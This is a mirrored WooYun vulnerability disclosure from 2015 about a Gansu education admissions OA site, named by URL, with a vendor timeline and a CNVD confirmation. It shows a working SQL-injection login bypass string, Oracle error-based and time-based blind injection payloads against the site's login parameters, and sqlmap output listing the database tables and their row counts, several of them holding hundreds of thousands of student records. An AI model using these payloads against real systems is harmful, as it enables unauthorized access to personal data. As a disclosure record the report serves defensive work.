乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-25: 细节已通知厂商并且等待厂商处理中 2015-06-29: 厂商已经确认,细节仅向厂商公开 2015-07-09: 细节向核心白帽子及相关领域专家公开 2015-07-19: 细节向普通白帽子公开 2015-07-29: 细节向实习白帽子公开 2015-08-13: 细节向公众公开
Rt。
站点
http://oa.gszs.cn/
可万能密码admin' or '1'='1登录。
在后台好像浏览不了数据,POST注入可以看到很多信息,注入时url有token和验证码,需要抓包,会话过期后需重新抓包。
Parameter: #1* ((custom) POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: userName=sads' AND 9021=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9021=9021) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(112)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'OYiL'='OYiL&password=asdad&verify=9258&clsName=LoginAction&methodName=login&action=login Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: userName=sads' AND 6668=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)AND 'VjWG'='VjWG&password=asdad&verify=9258&clsName=LoginAction&methodName=login&action=login---[13:31:32] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle
表T_BMK_UPLOAD 有30多万条信息。。
防止查水表,其它的表还有很多信息,点到为止。。。
Database: GSZS+--------------------------+---------+| Table | Entries |+--------------------------+---------+| T_ZYTB_LOG4J_BAK | 2697420 || T_ZYZJ_LOG4J | 1579186 || T_ZYZJ_LOG4J_BAK | 1525655 || T_WSBM_LOG4J | 790013 || TB_ZYZJ_ZYK_BAK | 398057 || T_BMK_UPLOAD | 303838 || TB_BMK | 303838 || TB_TJM | 282588 || TB_GKCJCXK | 268253 || T_PUBLICITY | 267792 || T_PZ_BMK | 237650 || T_LOG4J_QUERY | 231316 || TB_LQK | 229233 || TB_TJFC_BAK | 159732 || T_YS_HGKSBAK | 69825 || T_UNIVERSITY_LOG4J | 61956 || T_CZ_BMK | 46773 || TB_CZ_CJK | 44078 || T_CZ_CJK | 41127 || TB_JHK | 38663 || T_CZ_LQK | 36826 || T_LYJH_CHECK | 36679 || T_LYJH_ADJUST | 35932 || T_SS62_LYJH | 35868 || T_YSTY_TKCJCXK | 34769 || T_HPE_BMK | 29951 || T_YS_CJK | 23610 || T_HPE_LQK | 21226 || TB_ZYZJ_ZYK | 16217 || T_YS_TKCJCXK | 14416 || TB_YS_CJK | 10948 || T_YX_LQFSX | 10878 || T_BMK | 10799 || T_HPE_LQK_TMP | 7786 || T_SXS_DZCJK | 6466 || T_SXS_DZLQK | 6466 || T_TYTK_CJK | 5659 || T_YY_TKCJCXK | 5440 || T_BD_TKCJCXK | 5262 || T_LYJH_YXBZ | 4972 || TB_ZYZJ_TJFC | 4776 || T_USER_SCHOOL | 4378 || T_USER_UNIVERSITY | 2653 || SS62_TC_YXZGBMDM | 2641 || SS62_TC_YXBGTZH | 2158 || SS62_TC_ZYDM | 2075 || TD_ZXDM | 1870 || T_CZ_JHK | 1452 || TB_ZYZJ_JHK | 1390 || T_WD_TKCJCXK | 1318 || T_YCYH | 1237 || T_YS_ZYK | 1050 || TB_CZ_JHK | 1050 || T_TSZS_LYJH | 965 || T_YHQXZ | 933 || RG_USER | 930 || T_YSXK_XKZY | 926 || TB_USER | 916 || T_ZXDM_APPLY | 611 || T_YXZGBM_RIGHT | 531 || T_QXZQX | 423 || T_PREPARATORY_LYJH | 277 || T_PREPARATORY_YXBZ | 218 || RG_MODEL | 178 || T_YS_ACCEPTED_PRINCIPLES | 176 || T_YSXK_YXLXFS | 142 || TB_XZQHDM | 112 || TD_XZQHDM | 108 || TD_ZGBMDM | 108 || T_DESC_OF_TABLE | 85 || T_TSZS_YXBZ | 71 || T_YS_YXLIST | 63 || TB_CZ_MZDM | 58 || TD_MZDM | 58 || SS62_TC_ZGBMDM | 56 || SS62_TC_JHLBDM | 51 || SS62_TC_KSLXDM | 42 || T_ADMIN_LOG4J | 39 || TB_PRIVILEGE | 29 || TD_TKKMMC | 27 || T_HPE_YXDM | 24 || TB_DYTJDM | 24 || RG_MODEL_UNIVERSITY | 22 || SS62_TC_XHLXDM | 20 || T_CZ_KQDM | 19 || TB_CZ_KQ | 19 || SS62_TC_PCDM | 16 || TD_TKKMDM | 16 || TD_KSKLDM | 15 || T_CONFIGURE | 14 || T_CZ_KSTZDM | 13 || T_CZ_WTDM | 13 || TB_CZ_KSTZDM | 13 || TB_CZ_ZZMMDM | 13 || TD_TKLBDM | 13 || SS62_TC_JHXZDM | 12 || T_CZ_ZYSXDM | 12 || T_GROUP | 12 || T_SCH_USER_MODEL | 12 || TB_CZ_ZYSXDM | 12 || SS62_TC_KLDM | 11 || SS62_TC_ZYLBDM | 11 || TB_TSKSQKSM | 10 || RG_MODEL_HSCHOOL | 9 || SS62_TC_WYYZDM | 8 || T_CZ_ZYLBDM | 8 || T_TABLE_NAME | 8 || TB_CZ_ZYLBDM | 8 || TB_KSKLDM | 8 || TB_ZYZJ_CONFIGURE | 8 || TD_WYYZDM | 8 || T_CZ_WHCDDM | 7 || TB_CZ_WHCDDM | 7 || TB_CZ_WYYZDM | 7 || TD_TSKSDM | 7 || SS62_TC_XZDM | 6 || TD_BYLBDM | 6 || T_YSXK_KDDM | 5 || TD_QUERYITEMS | 5 || SS62_TC_KSKLDM | 4 || T_CZ_TJFCDM | 4 || TB_CZ_TJFCDM | 4 || TB_KSLBDM | 4 || TB_PCDM | 4 || TB_ROLE | 4 || TD_KSLBDM | 4 || TD_MZSJDM | 4 || TD_YSZYLBDM | 4 || TD_ZZMMDM | 4 || T_CZ_CONFIGURE | 3 || T_CZ_ZJLXDM | 3 || TB_CZ_ZJLXDM | 3 || TD_JSYWDM | 3 || SS62_TC_BGTZH | 2 || SS62_TC_CCDM | 2 || T_POLICY_FILE_ATTACHMENT | 2 || T_POLICY_FILE_SUMMARY | 2 || T_UPLOAD_CJK | 2 || T_UPLOAD_LQK | 2 || T_YSXK_KDLXDM | 2 || TB_CZ_XBDM | 2 || TB_ZYTB_CONFIGURE | 2 || TD_KSLXDM | 2 || TD_XBDM | 2 || TB_COUNTER | 1 || TB_CZWB_CONFIGURE | 1 |+--------------------------+---------+
尽快修复,过滤。
危害等级:高
漏洞Rank:11
确认时间:2015-06-29 18:17
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给甘肃分中心,由甘肃分中心后续协调网站管理单位处置。
暂无